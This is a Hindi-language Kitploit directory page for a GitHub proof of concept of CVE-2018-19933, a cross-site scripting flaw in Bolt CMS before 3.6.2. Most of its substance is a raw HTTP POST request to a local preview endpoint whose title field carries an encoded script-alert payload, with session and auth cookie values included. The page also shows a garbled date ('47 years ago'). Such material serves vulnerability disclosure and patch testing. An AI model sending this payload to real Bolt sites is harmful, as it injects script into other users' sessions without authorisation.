Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Bolt-CMS-3.6.2---Cross-Site-Scripting — Bolt CMS <3.6.2 - क्रॉस-साइट स्क्रिप्टिंग भेद्यता | Kitploit
उपकरण/GitHubGitHub/rdincel1/bolt-cms-3.6.2---cross-site-scripting
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrdincel1/bolt-cms-3.6.2---cross-site-scripting

Bolt-CMS-3.6.2---Cross-Site-Scripting

Bolt CMS <3.6.2 - क्रॉस-साइट स्क्रिप्टिंग भेद्यता

रिपॉजिटरी देखें
47 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Bolt CMS <3.6.2 - क्रॉस-साइट स्क्रिप्टिंग भेद्यता

Bolt CMS <3.6.2 - क्रॉस-साइट स्क्रिप्टिंग भेद्यता

CVE-2018-19933

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19933

प्रूफ ऑफ कॉन्सेप्ट

भेद्यता का शोषण करने के लिए, Bolt CMS <3.6.2 में टेक्स्ट इनपुट और प्रीव्यू बटन पर क्लिक के माध्यम से XSS संभव है, जैसा कि Configured और New Entry के Title फ़ील्ड द्वारा प्रदर्शित किया गया है।

POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=

प्रूफ ऑफ कॉन्सेप्ट (वीडियो)

PoC_Video

स्क्रीनशॉट

PoC_1 अनुरोध

टूल डाउनलोड करें